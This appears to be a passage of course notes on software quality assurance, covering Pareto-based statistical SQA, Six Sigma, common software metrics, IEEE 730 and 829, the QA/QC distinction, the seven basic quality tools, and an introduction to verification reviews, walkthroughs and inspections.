3. Using the Pareto principle (80 percent of the defects can be traced to 20 percent of all possible causes), isolate the 20 percent (the vital few).

4. Once the vital few causes have been identified, move to correct the problems that have caused the errors and defects.

This relatively simple concept represents an important step toward the creation of an adaptive software process in which changes are made to improve those elements of the process that introduce error.

16.5.1 A Generic Example

To illustrate the use of statistical methods for software engineering work, assume that a software engineering organization collects information on errors and defects for a period of one year. Some of the errors are uncovered as software is being developed. Others (defects) are encountered after the software has been released to its end users. Although hundreds of different problems are uncovered, all can be tracked to one (or more) of the following causes:

• Incomplete or erroneous specifications (IES)

• Misinterpretation of customer communication (MCC)

"A statistical analysis, properly conducted, is a delicate dissection of uncertainties, a surgery of suppositions." (M. J. Moroney)




• Intentional deviation from specifications (IDS)

• Violation of programming standards (VPS)

• Error in data representation (EDR)

• Inconsistent component interface (ICI)

• Error in design logic (EDL)

• Incomplete or erroneous testing (IET)

• Inaccurate or incomplete documentation (IID)

• Error in programming language translation of design (PLT)

• Ambiguous or inconsistent human/computer interface (HCI)

• Miscellaneous (MIS)

To apply statistical SQA, the table in Figure 16.2 is built. The table indicates that IES, MCC, and EDR are the vital few causes that account for 53 percent of all errors. It should be noted, however, that IES, EDR, PLT, and EDL would be selected as the vital few causes if only serious errors are considered. Once the vital few causes are determined, the software engineering organization can begin corrective action. For example, to correct MCC, you might implement requirements gathering techniques (Chapter 5) to improve the quality of customer communication and specifications. To improve EDR, you might acquire tools for data modeling and perform more stringent data design reviews.

It is important to note that corrective action focuses primarily on the vital few. As the vital few causes are corrected, new candidates pop to the top of the stack.

Statistical quality assurance techniques for software have been shown to provide substantial quality improvement [Art97].


FIGURE 16.2  Data collection for statistical SQA

Error     Total          Serious        Moderate       Minor
          No.     %      No.     %      No.     %      No.     %
IES       205     22%    34      27%    68      18%    103     24%
MCC       156     17%    12       9%    68      18%     76     17%
IDS        48      5%     1       1%    24       6%     23      5%
VPS        25      3%     0       0%    15       4%     10      2%
EDR       130     14%    26      20%    68      18%     36      8%
ICI        58      6%     9       7%    18       5%     31      7%
EDL        45      5%    14      11%    12       3%     19      4%
IET        95     10%    12       9%    35       9%     48     11%
IID        36      4%     2       2%    20       5%     14      3%
PLT        60      6%    15      12%    19       5%     26      6%
HCI        28      3%     3       2%    17       4%      8      2%
MIS        56      6%     0       0%    15       4%     41      9%
Totals    942    100%   128     100%   379     100%    435    100%

"20 percent of the code has 80 percent of the errors. Find them, fix them!" (Lowell Arthur)



In some cases, software organizations have achieved a 50 percent reduction per year in defects after applying these techniques.

The application of statistical SQA and the Pareto principle can be summarized in a single sentence: Spend your time focusing on things that really matter, but first be sure that you understand what really matters!
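As a minimal sketch of the Pareto analysis in step 3 above, the Python fragment below ranks the cause categories from Figure 16.2 by their total defect counts and accumulates percentages until roughly half of all defects are covered, reproducing the selection of IES, MCC, and EDR as the vital few (the 50 percent threshold is an assumption for illustration):

# Total defect counts per cause, taken from Figure 16.2.
defects_by_cause = {
    "IES": 205, "MCC": 156, "IDS": 48, "VPS": 25, "EDR": 130, "ICI": 58,
    "EDL": 45, "IET": 95, "IID": 36, "PLT": 60, "HCI": 28, "MIS": 56,
}

def vital_few(counts: dict, threshold: float = 0.5) -> list:
    """Return the smallest set of top causes covering `threshold` of defects."""
    total = sum(counts.values())
    selected, covered = [], 0
    for cause, n in sorted(counts.items(), key=lambda kv: kv[1], reverse=True):
        selected.append(cause)
        covered += n
        if covered / total >= threshold:
            break
    return selected

print(vital_few(defects_by_cause))   # ['IES', 'MCC', 'EDR'] -> ~52% of all errors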

16.5.2 Six Sigma for Software Engineering

Six Sigma is the most widely used strategy for statistical quality assurance in industry today. Originally popularized by Motorola in the 1980s, the Six Sigma strategy "is a rigorous and disciplined methodology that uses data and statistical analysis to measure and improve a company's operational performance by identifying and eliminating 'defects' in manufacturing and service-related processes" [ISI08]. The term Six Sigma is derived from six standard deviations—3.4 instances (defects) per million occurrences—implying an extremely high quality standard. The Six Sigma methodology defines three core steps:

• Define customer requirements and deliverables and project goals via well-defined methods of customer communication.

• Measure the existing process and its output to determine current quality performance (collect defect metrics).

• Analyze defect metrics and determine the vital few causes.

If an existing software process is in place, but improvement is required, Six Sigma suggests two additional steps:

• Improve the process by eliminating the root causes of defects.

• Control the process to ensure that future work does not reintroduce the causes of defects.

These core and additional steps are sometimes referred to as the DMAIC (define, measure, analyze, improve, and control) method.

If an organization is developing a software process (rather than improving an existing process), the core steps are augmented as follows:

• Design the process to (1) avoid the root causes of defects and (2) meet customer requirements.

• Verify that the process model will, in fact, avoid defects and meet customer requirements.

This variation is sometimes called the DMADV (define, measure, analyze, design, and verify) method.

A comprehensive discussion of Six Sigma is best left to resources dedicated to the subject. If you have further interest, see [ISI08], [Pyz03], and [Sne03].



Measurements

A software metric is a measure of some property of a piece of software or its specifications. The goal is to obtain objective, reproducible, and quantifiable measurements, which may have numerous valuable applications in schedule and budget planning, cost estimation, quality assurance testing, software debugging, software performance optimization, and optimal personnel task assignments.

Software quality metrics are a subset of software metrics that focus on the quality aspects of the product, process, and project.

Common software measurements include:

Balanced scorecard

The balanced scorecard (BSC) is a strategy performance management tool: a semi-standard structured report, supported by design methods and automation tools, that can be used by managers to keep track of the execution of activities by the staff within their control and to monitor the consequences arising from these actions.

The critical characteristics that define a balanced scorecard are:

• its focus on the strategic agenda of the organization concerned
• the selection of a small number of data items to monitor
• a mix of financial and non-financial data items.

Code coverage

Code coverage is a measure used to describe the degree to which the source code of a program is tested by a particular test suite. A program with high code coverage has been more thoroughly tested and has a lower chance of containing software bugs than a program with low code coverage. Many different metrics can be used to calculate code coverage; some of the most basic are the percent of program subroutines and the percent of program statements called during execution of the test suite.
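As a minimal illustration of statement coverage, one of the basic metrics just mentioned, the sketch below computes the percentage of statements exercised by a test suite; the input line sets are assumed to come from whatever coverage instrumentation you use:

def statement_coverage(executed_lines: set, executable_lines: set) -> float:
    """Percentage of executable statements exercised by the test suite."""
    if not executable_lines:
        return 100.0
    return 100.0 * len(executed_lines & executable_lines) / len(executable_lines)

# Example: a module with 40 executable statements, 30 of which were hit.
executable = set(range(1, 41))   # line numbers of executable statements
executed = set(range(1, 31))     # lines actually run under the tests
print(f"{statement_coverage(executed, executable):.0f}% statement coverage")  # 75%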

Cohesion

Cohesion refers to the degree to which the elements of a module belong together. Thus, it is a measure of how strongly related each piece of functionality expressed by the source code of a software module is.

Cohesion is an ordinal type of measurement and is usually described as "high cohesion" or "low cohesion". Modules with high cohesion tend to be preferable because high cohesion is associated with several desirable traits of software including robustness, reliability, reusability, and understandability, whereas low cohesion is associated with undesirable traits such as being difficult to maintain, difficult to test, difficult to reuse, and even difficult to understand.

Coupling

Coupling or dependency is the degree to which each program module relies on each one of the other modules.

Coupling is usually contrasted with cohesion. Low coupling often correlates with high cohesion, and vice versa. Low coupling is often a sign of a well-structured computer system and a good design, and when combined with high cohesion, supports the general goals of high readability and maintainability.

Cyclomatic complexity

Cyclomatic complexity is a software metric (measurement). It is a quantitative measure of the complexity of programming instructions. It directly measures the number of linearly independent paths through a program's source code.

Cyclomatic complexity is computed using the control flow graph of the program: the nodes of the graph correspond to indivisible groups of commands of a program, and a directed edge connects two nodes if the second command might be executed immediately after the first command. Cyclomatic complexity may also be applied to individual functions, modules, methods or classes within a program.

One testing strategy, called basis path testing by McCabe, who first proposed it, is to test each linearly independent path through the program; in this case, the number of test cases will equal the cyclomatic complexity of the program.
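As a small illustration, cyclomatic complexity can be computed from a control flow graph as V(G) = E - N + 2P, where E is the number of edges, N the number of nodes, and P the number of connected components; the graph below is a hypothetical function with one if/else branch:

def cyclomatic_complexity(edges: int, nodes: int, components: int = 1) -> int:
    """V(G) = E - N + 2P for a control flow graph."""
    return edges - nodes + 2 * components

# Hypothetical control flow graph of a function with one if/else branch:
# entry -> condition, condition -> then, condition -> else,
# then -> exit, else -> exit
print(cyclomatic_complexity(edges=5, nodes=5))  # 2 linearly independent paths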

Function point

A function point is a unit of measurement to express the amount of business functionality an information system (as a product) provides to a user. Function points measure software size. The cost (in dollars or hours) of a single unit is calculated from past projects.

The use of function points in favor of lines of code seeks to address several additional issues:

• The risk of "inflation" of the created lines of code, and thus reducing the value of the measurement system, if developers are incentivized to be more productive. FP advocates refer to this as measuring the size of the solution instead of the size of the problem.


• Lines of Code (LOC) measures reward low-level languages, because more lines of code are needed to deliver a similar amount of functionality compared with a higher-level language. C. Jones offers a method of correcting this in his work.

• LOC measures are not useful during early project phases where estimating the number of lines of code that will be delivered is challenging. However, Function Points can be derived from requirements and therefore are useful in methods such as estimation by proxy.

A function can be defined as a collection of executable statements that performs a certain task, together with declarations of the formal parameters and local variables manipulated by those statements (Conte et al., 1986). The ultimate measure of software productivity is the number of functions a development team can produce given a certain amount of resource, regardless of the size of the software in lines of code.
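As a quick sketch of the costing idea mentioned above, where the unit cost of a function point is calibrated from past projects (the numbers here are made up for illustration):

def cost_per_function_point(past_cost: float, past_fp: int) -> float:
    """Unit cost of one function point, calibrated from a past project."""
    return past_cost / past_fp

# A past project delivered 500 function points for $250,000,
# so a new 200-FP project is estimated at $100,000.
unit_cost = cost_per_function_point(250_000, 500)   # $500 per FP
print(unit_cost * 200)                              # 100000.0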

DSQI

DSQI (design structure quality index) is an architectural design metric used to evaluate a computer program's design structure and the efficiency of its modules. The metric was developed by the United States Air Force Systems Command.

The result of DSQI calculations is a number between 0 and 1. The closer to 1, the higher the quality. It is best used on a comparison basis, i.e., with previous successful projects.

Instruction path length

In computer performance, the instruction path length is the number of machine code instructions required to execute a section of a computer program. The total path length for the entire program could be deemed a measure of the algorithm's performance on a particular computer hardware. The path length of a simple conditional instruction would normally be considered as equal to 2, one instruction to perform the comparison and another to take a branch if the particular condition is satisfied. The length of time to execute each instruction is not normally considered in determining path length and so path length is merely an indication of relative performance rather than in any sense absolute.

When executing a benchmark program, most of the instruction path length is typically inside the program's inner loop.

Source lines of code

Source lines of code (SLOC), also known as lines of code (LOC), is a software metric used to measure the size of a computer program by counting the number of lines in the text of the program's source code. SLOC is typically used to predict the amount of effort that will be required to develop a program, as well as to estimate programming productivity or maintainability once the software is produced.
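A toy counter for physical, non-blank, non-comment source lines follows; this is only one of many possible SLOC conventions, so treat the counting rules as an assumption:

def count_sloc(path: str, comment_prefix: str = "#") -> int:
    """Count non-blank source lines, ignoring full-line comments."""
    sloc = 0
    with open(path, encoding="utf-8") as src:
        for line in src:
            stripped = line.strip()
            if stripped and not stripped.startswith(comment_prefix):
                sloc += 1
    return sloc

print(count_sloc("example.py"))  # hypothetical file name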


Execution time

Execution time is the time during which a program is running (executing), in contrast to other phases of a program's lifecycle such as compile time, link time, load time, etc.

A run-time error is detected after or during the execution of a program, whereas a compile-time error is detected by the compiler before the program is ever executed. Type checking, register allocation, code generation, and code optimization are typically done at compile time, but may be done at run time depending on the particular language and compiler.

Program load time: the time required to load the code.

Program size: the size of the code.

Three groups of software quality metrics can be distinguished: product quality, in-process quality, and maintenance quality.

I. Product Quality Metrics

Software quality consists of two levels: intrinsic product quality and customer satisfaction. The key metrics are:

• Mean time to failure
• Defect density
• Customer problems
• Customer satisfaction

Intrinsic product quality is usually measured by the number of "bugs" (functional defects) in the software or by how long the software can run before encountering a "crash." In operational definitions, the two metrics are defect density (rate) and mean time to failure (MTTF). The two metrics are correlated but are different enough to merit close attention: one measures the time between failures, the other measures the defects relative to the software size (lines of code, function points, etc.).

The Defect Density Metric

Lines of code can be counted in several ways:

• Count only executable lines.
• Count executable lines plus data definitions.
• Count executable lines, data definitions, and comments.
• Count executable lines, data definitions, comments, and job control language.
• Count lines as physical lines on an input screen.
• Count lines as terminated by logical delimiters.

Customer Problems Metric

The problems metric is usually expressed in terms of problems per user month (PUM):

PUM = Total problems that customers reported (true defects and non-defect-oriented problems) for a time period ÷ Total number of license-months of the software during the period

where

Number of license-months = Number of installed licenses of the software × Number of months in the calculation period

Customer Satisfaction Metrics

Customer satisfaction is often measured by customer survey data via the five-point scale:

• Very satisfied
• Satisfied
• Neutral
• Dissatisfied
• Very dissatisfied

Satisfaction with the overall quality of the product and its specific dimensions is usually obtained through various methods of customer surveys.

II. In-Process Quality Metrics

Because our goal is to understand the programming process and to learn to engineer quality into the process, in-process quality metrics play an important role. In-process quality metrics are less formally defined than end-product metrics, and their practices vary greatly among software developers. On the one hand, for some organizations in-process quality metrics simply means tracking defect arrival during formal machine testing. On the other hand, some software organizations with well-established software metrics programs cover various parameters in each phase of the development cycle.

III. Metrics for Software Maintenance

When development of a software product is complete and it is released to the market, it enters the maintenance phase of its life cycle. During this phase the defect arrivals by time interval and customer problem calls (which may or may not be defects) by time interval are the de facto metrics. However, the number of defect or problem arrivals is largely determined by the development process before the maintenance phase; not much can be done to alter the quality of the product during this phase. Therefore, these two de facto metrics, although important, do not reflect the quality of software maintenance. What can be done during the maintenance phase is to fix the defects as soon as possible and with excellent fix quality. Such actions, although still not able to improve the defect rate of the product, can improve customer satisfaction to a large extent. The following metrics are therefore very important:

• Fix backlog and backlog management index
• Fix response time and fix responsiveness
• Percent delinquent fixes
• Fix quality

1. Fix Backlog and Backlog Management Index

Fix backlog is a workload statement for software maintenance. It is related to both the rate of defect arrivals and the rate at which fixes for reported problems become available. It is a simple count of reported problems that remain at the end of each month or each week. Used in the format of a trend chart, this metric can provide meaningful information for managing the maintenance process. Another metric to manage the backlog of open, unresolved problems is the backlog management index (BMI).

2. Fix Response Time and Fix Responsiveness

For many software development organizations, guidelines are established on the time limit within which fixes should be available for reported defects. Usually the criteria are set in accordance with the severity of the problems. For critical situations in which the customers' businesses are at risk due to defects in the software product, software developers or the software change teams work around the clock to fix the problems. For less severe defects for which circumventions are available, the required fix response time is more relaxed.

3. Percent Delinquent Fixes

The mean (or median) response time metric is a central tendency measure. A more sensitive metric is the percentage of delinquent fixes: for each fix, if the turnaround time greatly exceeds the required response time, it is classified as delinquent.
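The sketch below computes defect density, PUM, BMI, and percent delinquent fixes. The defect density and PUM formulas follow the definitions above; BMI and the delinquency percentage are commonly given as (problems closed ÷ problem arrivals) × 100 and (delinquent fixes ÷ fixes delivered) × 100 respectively, but treat those two as assumptions and check your organization's definitions:

def defect_density(defects: int, kloc: float) -> float:
    """Defects per thousand lines of code."""
    return defects / kloc

def pum(problems_reported: int, installed_licenses: int, months: int) -> float:
    """Problems per user month = problems / license-months."""
    return problems_reported / (installed_licenses * months)

def bmi(problems_closed: int, problem_arrivals: int) -> float:
    """Backlog management index (%); above 100 means the backlog is shrinking."""
    return 100.0 * problems_closed / problem_arrivals

def percent_delinquent(delinquent_fixes: int, fixes_delivered: int) -> float:
    """Share of fixes whose turnaround time exceeded the required response time."""
    return 100.0 * delinquent_fixes / fixes_delivered

# Illustrative numbers only:
print(defect_density(45, 120.0))   # 0.375 defects/KLOC
print(pum(300, 1000, 12))          # 0.025 problems per license-month
print(bmi(90, 80))                 # 112.5% -> backlog shrinking
print(percent_delinquent(6, 90))   # ~6.7%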


IEEE standards

1. IEEE 730-2002

There are three groups to whom this standard applies or may affect: the user, the supplier, and the public. a) The user, who may be another element of the same organization developing the software, has a need for the product. Further, the user needs the product to meet the requirements identified in the specification. The user thus cannot afford a "hands-off" attitude toward the supplier and rely solely on a test to be executed at the end of the software development time period. If the product should fail, not only does the same need still exist, but also a portion of the development time has been lost. Therefore, the user needs to obtain a reasonable degree of confidence that the product is in the process of acquiring required attributes during software development. b) The supplier needs an established standard against which to plan and to be measured. It is unreasonable to expect a complete reorientation from project to project. Not only is it not cost effective, but, unless there exists a stable framework on which to base changes, improvement cannot be made. c) The public may be affected by the use of the product. The public may include, for example, depositors at a bank or passengers using a reservation system. The public users have requirements, such as legal rights, which preclude haphazard development of software. At some later date, the provider of the services to the public user and the supplier may be required to show that they acted in a reasonable and prudent professional manner to ensure that required software attributes were acquired.

Contents

1. Purpose

2. Reference documents

3. Management

4. Documentation

5. Standards, practices, convention, and metrics

6. Software Reviews

7. Tests

8. Problem reporting and corrective actions


9. Tools, techniques, and methodologies

10. Media control

11. Supplier control

12. Records collection, maintenance, and retention

13. Training

14. Risk management

15. Glossary

16. SQAP change procedure and history

2. IEEE 829-2008

Unlike IEEE 730, IEEE 829 is a longer standard: it is more than 118 pages long. But don't panic; that is because the whole standard consists of document specifications for testing, and the one we will look at particularly this time is the first one, the Test Plan.

The following is the outline of the test plan defined by IEEE 829:

1. Test plan identifier
2. Introduction
3. Test items
4. Features to be tested
5. Features not to be tested
6. Approach
7. Item pass/fail criteria
8. Suspension criteria and resumption requirements
9. Test deliverables
10. Testing tasks
11. Environmental needs
12. Responsibilities
13. Staffing and training needs
14. Schedule
15. Risks and contingencies
16. Additional sections
17. Approvals

Yes, you might expect that there are more sub-items under each of these headings; they can be checked in the standard itself.


This time, the major part of the document falls on item 6, the test approach, because in the test plan document we focus on the quality control part of the project, and this is done primarily by testing.

The IEEE Std 829 provides an outline of the Master Test Plan (MTP). Developing an MTP involves selecting the constituent parts of the project's test effort; setting the objectives for each part; setting the division of labor in terms of time and resources, and the interrelationships between the parts; identifying the risks, assumptions, and standards of workmanship to be considered and accounted for by the parts; defining the test effort's controls; and confirming the applicable objectives set by quality assurance planning. It also identifies the number of levels of test, the overall tasks to be performed, and the documentation requirements.

In addition, the IEEE Std 829 recommends that for each test activity, the following topics be addressed.

• Test tasks: Identify the test tasks.
• Methods: Describe the methods and procedures for each test task, including tools. Also, define the criteria for evaluating the test task results.
• Inputs: Identify the required inputs for the test task. Specify the source of each input. Inputs may be derived from preceding tasks or activities.
• Outputs: Identify the required outputs from the test task.
• Schedule: Describe the schedule for the test tasks. Establish specific milestones for initiating and completing each task, for obtaining input and for delivery of output.
• Resources: Identify the resources for the performance of the test tasks. Examples of resources include people, tools, equipment, facilities, budgets, etc.
• Risks and assumptions: Identify any risks and assumptions associated with the test tasks. Include recommendations to eliminate, reduce or mitigate identified risks.
• Roles and responsibilities: Identify for each task who has the primary and secondary responsibilities for task execution and the nature of the roles they will play.

Test administration requirements: These are needed to administer tests during execution and involve describing the following.

• Anomaly resolution and reporting process: Describe the method of reporting and resolving anomalies. This would include information about the anomaly criticality levels, authority and time line for resolution.

• Task iteration policy: Describe the criteria for repeating testing tasks when their input is changed or the task procedure is changed; for example, re-executing tests after anomalies have been fixed.

• Deviation policy: Describe the procedures and criteria for deviation from the MTP and test documentation. The information for deviations includes task identification, rationale and effect on product quality. Also, identify the authorities responsible for approving deviations.

• Control procedures: Identify control procedures for test activities. These procedures describe how the system, software products and test results will be configured, protected and stored. They may also describe quality assurance, configuration management, data management, compliance with existing security provisions and how test results are to be protected from unauthorized alterations.

• Standards, practices and conventions: Identify the standards, practices and conventions that govern the performance of testing tasks.


Quality assurance and control processes

Although QA and QC are closely related concepts, and are both aspects of quality management, they are fundamentally different in their focus:

• QC is used to verify the quality of the output; • QA is the process of managing for quality.

Achieving success in a project requires both QA and QC. If we only apply QA, then we have a set of processes that can be applied to ensure great quality in our delivered solution, but the delivered solution itself is never actually quality-checked. Likewise, if we only focus on QC then we are simply conducting tests without any clear vision for making our tests repeatable, or for understanding and eliminating problems found in testing.

In the ISO 9000 standard, clause 3.2.10 defines Quality Control as: "A part of quality management focused on fulfilling quality requirements."

Clause 3.2.11 defines Quality Assurance as: "A part of quality management focused on providing confidence that quality requirements will be fulfilled."

Software Quality Control:

"The function of software quality that checks that the project follows its standards, processes, and procedures, and that the project produces the required internal and external (deliverable) products"


Software Quality Assurance: "The function of software quality that assures that the standards, processes, and procedures are appropriate for the project and are correctly implemented"

Quality Assurance: a Strategy of Prevention

QA is focused on planning, documenting and agreeing on a set of guidelines that are necessary to assure quality. QA planning is undertaken at the beginning of a project, and draws on both software specifications and industry or company standards. The typical outcomes of the QA planning activities are quality plans, inspection and test plans, the selection of defect tracking tools and the training of people in the selected methods and processes. The purpose of QA is to prevent defects from entering into the solution in the first place. In other words, QA is a pro-active management practice that is used to assure a stated level of quality for an IT initiative. Undertaking QA at the beginning of a project is a key tool to mitigate the risks that have been identified during the specification phases. Communication plays a pivotal role in managing project risk, and is crucial for realizing effective QA. Part of any risk mitigation strategy is the clear communication of both the risks, and their associated remedies to the team or teams involved in the project.

Quality Control: a Strategy of Detection

Quality Control, on the other hand, includes all activities that are designed to determine the level of quality of the delivered ICT solutions. QC is a reactive means by which quality is gauged and monitored, and QC includes all operational techniques and activities used to fulfill requirements for quality. These techniques and activities are agreed with customers and/or stakeholders before project work is commenced. QC involves verification of output conformance to desired quality levels. This means that the ICT solution is checked against customer requirements, with various checks being conducted at planned points in the development lifecycle. Teams will use, amongst other techniques, structured walkthroughs, testing and code inspections to ensure that the solution meets the agreed set of requirements.

Benefits of Quality Management

The benefits of a structured approach to quality management cannot be ignored. Quality control is used, in conjunction with the quality improvement activity, to isolate and provide feedback on the causes of quality problems. By using this approach consistently, across projects, the feedback mechanism works towards identifying root-cause problems and then developing strategies for eliminating these problems. Using this holistic approach ensures that teams achieve ever higher levels of quality. As a consequence of formulating and executing a quality management plan, the company can expect:

• Greater levels of customer satisfaction, which will very likely result in both repeat business and referral business

• A motivated team that not only understand the policy objectives of the quality management plan, but who also actively participate in executing the plan

• Elimination of waste by eliminating rework arising from either the need to address bugs, or to address gaps in the solution’s ability to meet customer requirements

• Higher levels of confidence in planning, since the tasks arising from unplanned rework will fall away

• Financial rewards for the company, which are a consequence of new projects from existing and referral clients, as well as through the reduction of monies spent on rework tasks.


• Quality Assurance (QA) refers to the process used to create the deliverables, and can be performed by a manager, client, or even a third-party reviewer. Examples of quality assurance include process checklists, project audits and methodology and standards development.

• Quality Control (QC) refers to quality related activities associated with the creation of project deliverables. Quality control is used to verify that deliverables are of acceptable quality and that they are complete and correct. Examples of quality control activities include inspection, deliverable peer reviews and the testing process.


The Difference between Quality Assurance and Quality Control

The following are a few differences between the quality assurance and quality control processes:

• In quality assurance, you plan to avoid defects in the first place. On the other hand, in quality control, you try to find defects and correct them while making the product.

• Quality assurance is all about prevention, and quality control is all about detection.

• Quality assurance is a proactive process while quality control is a reactive process.

• Quality assurance is a process-based approach, while quality control is a product-based approach.

• Quality assurance involves processes managing quality, and quality control is used to verify the quality of the product.

• Quality audit is an example of quality assurance. Inspection and testing are examples of the quality control process.

• The goal of the quality assurance process is to develop a process so that defects do not arise when you are producing the product, and quality control identifies the defects after the product is produced but is not yet released or is still in the production phase.

The Benefits of Quality Assurance and Quality Control

Quality assurance and quality control are closely related and their objective is also the same, i.e. to deliver a defect-free product. Quality assurance and quality control are an integral part of a quality management plan.

These two processes complement each other, and failing to apply any of these will result in a failure of quality management on the project.

Following these quality management processes brings immense benefits to your organization. Some benefits are as follows:

• It gives you a high-quality output.
• It increases the efficiency of operations.
• It brings customer satisfaction, which affects your brand and helps you grow your business.
• If your product is of good quality, you will not need much rework and there will not be much after-sale support required. This will help you save a lot of money.
• A high level of confidence and a motivated team.


Statistical Quality Control

Quality control techniques require extensive usage of statistical methods. The advantages of the statistical analysis are as follows:

Statistical tools are automated and therefore require less manual intervention, leading to cost reduction.

Statistical tools work on a model and are thus very useful where testing requires destruction of products.

Statistical quality tools can broadly be classified into the following categories:

• Acceptance sampling, an important part of quality control wherein the quality of products is assessed post production.
• Statistical process control, which helps in confirming whether the current process is falling within pre-determined parameters.

Acceptance Sampling

Acceptance sampling is done on samples post production to check quality parameters decided by the organization, covering attributes as well as variables. If the sample does not meet the required quality parameters, the given lot is rejected, and further analysis is done to identify the source and rectify the defects. Acceptance sampling is done on the basis of inspection, which includes physical verification of color, size, shape, and so on.
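A minimal sketch of a single-sampling plan by attributes follows; the sample size n and acceptance number c are assumptions an organization would choose, not values from the text:

import random

def accept_lot(lot: list, n: int = 50, c: int = 2) -> bool:
    """Inspect a random sample of n items; accept the lot if defects found <= c."""
    sample = random.sample(lot, min(n, len(lot)))
    defects = sum(1 for item in sample if item == "defective")
    return defects <= c

# Hypothetical lot of 1,000 items with about 3% defectives:
lot = ["defective" if random.random() < 0.03 else "good" for _ in range(1000)]
print("Accept lot:", accept_lot(lot))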

The major objectives of inspection are:

• To detect and prevent defects in products and processes.
• To identify defective parts or products and prevent them from further consumption or usage.
• To highlight product or process defects to the appropriate authorities for necessary corrective actions.

The scope of inspection covers input materials, finished material, plant, machinery, etc.

To sustain the quality of products and services, it is important to have robust quality control techniques in place.


Quality Control tools

Most of the organizations use quality tools for various purposes related to controlling and assuring quality.

Although there are a good number of quality tools specific to certain domains, fields and practices, some of the quality tools can be used across such domains. These quality tools are quite generic and can be applied to any condition.

There are seven basic quality tools used in organizations. These tools can provide much information about problems in the organization, assisting in deriving solutions for them.

A number of these quality tools come with a price tag. A brief training, mostly a self-training, is sufficient for someone to start using the tools.

Let's have a look at the seven basic quality tools in brief.

1. Flow Charts

This is one of the basic quality tools; it can be used for analyzing a sequence of events.

The tool maps out a sequence of events that take place sequentially or in parallel. The flow chart can be used to understand a complex process in order to find the relationships and dependencies between events.

You can also get a brief idea about the critical path of the process and the events involved in the critical path.

Flow charts can be used for any field and to illustrate events involving processes of any complexity. There are specific software tools developed for drawing flow charts, such as MS Visio.

You will be able to freely download some of the open source flow chart tools developed by the open source community.


2. Histogram

A histogram is used to illustrate frequency and extent in the context of two variables.

A histogram is a chart with columns representing the distribution of values. If the distribution is normal, the graph takes the shape of a bell curve; if it is not normal, it may take different shapes depending on the condition of the distribution. A histogram can be used to measure something against another thing; there should always be two variables.

Consider the following example: a histogram showing the morning attendance of a class, with the time of day on the X-axis and the number of students on the Y-axis.


3. Cause and Effect Diagram

Cause and effect diagrams (Ishikawa Diagram) are used for understanding organizational or business problem causes.

Organizations face problems every day, and it is necessary to understand the causes of these problems in order to solve them effectively. Creating a cause and effect diagram is usually a team exercise.

A brainstorming session is required in order to come up with an effective cause and effect diagram.

All the main components of a problem area are listed, and possible causes from each area are identified.

Then, most likely causes of the problems are identified to carry out further analysis.

4. Check Sheet

A check sheet can be introduced as the most basic tool for quality.

A check sheet is basically used for gathering and organizing data.

When this is done with the help of software packages such as Microsoft Excel, you can derive further analysis graphs and automate processing through the available macros.


Therefore, it is always a good idea to use a software check sheet for information gathering and organizing needs.

One can always use a paper-based check sheet when the information gathered is only used for backup or storing purposes other than further processing.

5. Scatter Diagram

When it comes to the values of two variables, scatter diagrams are the best way to present them. Scatter diagrams show the relationship between two variables and illustrate the results on a Cartesian plane.

Then, further analysis, such as trend analysis can be performed on the values.

In these diagrams, one variable denotes one axis and another variable denotes the other axis.


6. Control Charts

The control chart is the best tool for monitoring the performance of a process. These types of charts can be used for monitoring any process related to the functioning of the organization.

These charts allow you to identify the following conditions related to the process that has been monitored.

• Stability of the process
• Predictability of the process
• Identification of common causes of variation
• Special conditions where the monitoring party needs to react
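As a small sketch, a basic Shewhart-style control chart computes a center line and control limits at three standard deviations from the mean; points outside the limits signal the special conditions mentioned above. The three-sigma rule is the conventional choice and is assumed here:

from statistics import mean, stdev

def control_limits(samples: list) -> tuple:
    """Center line and lower/upper control limits at mean +/- 3 sigma."""
    center = mean(samples)
    sigma = stdev(samples)
    return center - 3 * sigma, center, center + 3 * sigma

# Hypothetical daily defect counts from a stable process:
daily_defects = [12, 9, 11, 10, 13, 8, 12, 11, 10, 9]
lcl, cl, ucl = control_limits(daily_defects)
out_of_control = [x for x in daily_defects if not lcl <= x <= ucl]
print(f"LCL={lcl:.1f}, CL={cl:.1f}, UCL={ucl:.1f}, signals={out_of_control}")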


7. Pareto Charts

Pareto charts are used for identifying a set of priorities. You can chart any number of issues/variables related to a specific concern and record the number of occurrences.

This way you can figure out the parameters that have the highest impact on the specific concern.

This helps you to work on the priority issues in order to get the situation under control.

The above seven basic quality tools help you to address different concerns in an organization. Therefore, the use of such tools should be a basic practice in the organization in order to enhance efficiency.

Training on these tools should be included in the organizational orientation program, so that all staff members get to learn these basic tools.


UNIT II - VERIFICATION

Introduction

Verification testing is the most effective way to remove defects from software. If most of the defects are removed prior to validation testing (i.e., unit, integration, system, and acceptance testing), validation testing can focus on testing to determine whether the software meets the true operational needs of the user and can be effectively integrated into the computer operations activity.

Because the experience of many testers is limited to unit, integration, systems, and acceptance testing, these testers are not experienced in verification techniques. The verification techniques are not complex, and once understood, can be easily implemented into the test process.

Typically, verification testing—testing in a static mode—is a manual process. Verification testing provides two important benefits: defects can be identified close to the point where they originate, and the cost to correct defects is significantly less than when detected in dynamic testing.

Verification testing normally occurs during the requirements, design, and program phases of software development, but it can also occur with outsourced software. There are many different techniques for verification testing, most of which focus on the documentation associated with building software. This chapter discusses the many different ways to perform verification testing during the requirements, design, and programming phases of software development.


Overview

Most but not all verification techniques are manual. However, even in manual techniques, automated tools can prove helpful. For example, when conducting a software review, reviewers might want to use templates to record responses to questions.

Because most testing focuses on validation/dynamic testing, verification technique names are not consistent. Consider, for example, a review, which is an independent investigation of some developmental aspect. Some call these reviews System Development Reviews, others call them End-of-Phase Reviews, still others refer to them as Peer Reviews, and some use Requirements Review. Because some of the verification techniques are similar, they may also be referred to as a walkthrough or inspection.

For the purposes of this chapter, specific names are assigned to the review techniques, as follows:

■■ Reviews. A review is a formal process in which peers and/or stakeholders challenge the correctness of the work being reviewed. For example, in a requirements review, the correctness and completeness of requirements is challenged. It is a formal process usually based on the experience of the organization or outside experts, and uses a predetermined set of questions to accomplish the objectives of the review.

■■ Walkthroughs. A walkthrough is an informal process by which peers and other stakeholders interact with project personnel to help ensure the best possible project is implemented. Frequently, the walkthrough is requested by the project team, to resolve issues that they are not sure they have resolved in the most effective and efficient manner. For example, they may be uncertain that they have the best design for a specific requirement and want an independent process to "brainstorm" better methods.

■■ Inspections. Inspections are a very formal process in which peers and project personnel assume very specific roles. The objective of an inspection is to ensure that the entrance criteria for a specific workbench were correctly implemented into the exit criteria. The inspection process literally traces the entrance criteria to the exit criteria to ensure that nothing is missing, nothing is wrong, and nothing has been added that was not in the entrance criteria.

